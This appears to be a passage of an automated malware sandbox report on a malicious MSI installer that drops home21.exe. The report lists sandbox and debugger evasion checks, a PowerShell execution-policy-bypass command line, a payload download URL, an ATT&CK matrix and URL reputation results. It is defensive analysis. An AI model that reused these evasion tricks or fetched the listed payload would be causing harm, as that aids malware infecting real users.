Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\Public\Documents\home21.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\Public\Documents\home21.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Source: C:\Users\Public\Documents\home21.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4168			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5652			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIBC4E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIBBDE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIBB6F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIBB00.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIBBBE.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep count: 4168 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 5652 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe TID: 8060	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5040	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: home21.exe, 00000006.00000003.1884936248.000000000B1F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: @Idassignednumbers@IdPORT_vmnet
Source: svchost.exe, 0000000B.00000002.4115614108.000001A07E054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.4112903015.000001A07CA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.4115565205.000001A07E041000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1862461184.00000000075A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: home21.exe, 00000006.00000003.1884936248.000000000B1F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: @Idassignednumbers@IdPORT_vmnet$@Idassignednumbers@IdPORT_genrad_mux

Source: C:\Users\Public\Documents\home21.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\Public\Documents\home21.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\Public\Documents\home21.exe	Open window title or class name: regmonclass
Source: C:\Users\Public\Documents\home21.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\Public\Documents\home21.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\Public\Documents\home21.exe	Open window title or class name: procmon_window_class
Source: C:\Users\Public\Documents\home21.exe	Open window title or class name: filemonclass
Source: C:\Users\Public\Documents\home21.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\Public\Documents\home21.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process queried: DebugObjectHandle	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Documents\home21.exe

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: hANEXOPDF.PDF40 234057.msi, type: SAMPLE
Source: Yara match	File source: amsi32_7688.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Installer\6dba16.msi, type: DROPPED

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue."

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue."	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\home21.exe "C:\Users\Public\Documents\home21.exe"	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://winhomemodulo.ddns.net/w2/	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssbc6b.ps1" -propfile "c:\users\user\appdata\local\temp\msibc58.txt" -scriptfile "c:\users\user\appdata\local\temp\scrbc59.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scrbc5a.txt" -propsep " :<->: " -testprefix "_testvalue."
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssbc6b.ps1" -propfile "c:\users\user\appdata\local\temp\msibc58.txt" -scriptfile "c:\users\user\appdata\local\temp\scrbc59.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scrbc5a.txt" -propsep " :<->: " -testprefix "_testvalue."			Jump to behavior

Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndSVW
Source: home21.exe, 00000006.00000003.1884936248.000000000B1F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: @Winapi@Windows@DOF_PROGMAN
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndU
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ReBarWindow32Shell_TrayWndMSTaskSwWClassMSTaskListWClassU
Source: home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	1 Replication Through Removable Media	1 Command and Scripting Interpreter	11 Scripting	12 Process Injection	21 Masquerading	OS Credential Dumping	531 Security Software Discovery	Remote Services	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	351 Virtualization/Sandbox Evasion	Security Account Manager	351 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	11 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hANEXOPDF.PDF40 234057.msi	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\Public\Documents\home21.exe	100%	Joe Sandbox ML
C:\Windows\Installer\MSIBB00.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIBB6F.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIBBBE.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIBBDE.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIBC4E.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://fontawesome.io	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://www.thawte.com/cps0/	0%	URL Reputation	safe
https://www.thawte.com/repository0W	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2.C:	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/soap12/SV	0%	Avira URL Cloud	safe
https://www.google.com.br/client_204?atyp=i&biw=1034&bih=870&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&opi=89978449	0%	Avira URL Cloud	safe
https://teste.meuly.online	0%	Avira URL Cloud	safe
https://teste.meulLRzq	0%	Avira URL Cloud	safe
https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png	0%	Avira URL Cloud	safe
https://aka.ms/pscore6lBzq	0%	Avira URL Cloud	safe
https://www.google.com.br/images/searchbox/desktop_searchbox_sprites318_hr.webp	0%	Avira URL Cloud	safe
http://www.indyproject.org/	0%	Avira URL Cloud	safe
https://ogs.google.com.br/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/soap/	0%	Avira URL Cloud	safe
http://winhomemodulo.ddns.net/w2/	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&s=webhp&t=all&imn=11&ima=2&imad=0&imac=0&wh=907&aftie=NF&aft=1&aftp=907&adh=&ime=1&imeae=0&imeap=0&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=205653&ucb=205653&mem=ujhs.6,tjhs.10,jhsl.2173,dm.8&nv=ne.1,feid.62fc9447-4556-440a-8b9a-5cf3e8b62e83&net=dl.1450,ect.3g,rtt.300&hp=&sys=hc.4&p=bs.true&rt=hst.96,cbt.97,prt.1047,afti.1379,aftip.1045,aft.1379,aftqf.1380,xjses.1934,xjsee.1982,xjs.1982,lcp.1407,fcp.1108,wsrt.3901,cst.678,dnst.10,rqst.728,rspt.373,sslt.678,rqstt.3546,unt.2855,cstt.2868,dit.4986&zx=1720114985264&opi=89978449	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/http	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/Prod.C:	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV2	0%	Avira URL Cloud	safe
https://ogs.google.com.br/widget/app/so	0%	Avira URL Cloud	safe
http://www.borland.com/namespaces/Types	0%	Avira URL Cloud	safe
https://teste.meuly.online/xxx/home21.exe	0%	Avira URL Cloud	safe
https://teste.meull	0%	Avira URL Cloud	safe
https://www.google.com.br/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=J9-GZvKjJq-Jxc8Pk7aqmA0.1720114985301&dpr=1&nolsbt=1	0%	Avira URL Cloud	safe
http://www.borland.com/namespaces/Types-IWSDLPublish	0%	Avira URL Cloud	safe
https://www.google.com.br/xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=kMFpHd,sy8x,bm51tf?xjs=s4	0%	Avira URL Cloud	safe
http://winhomemodulo.ddns.net/w2/openU	0%	Avira URL Cloud	safe
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	0%	Avira URL Cloud	safe
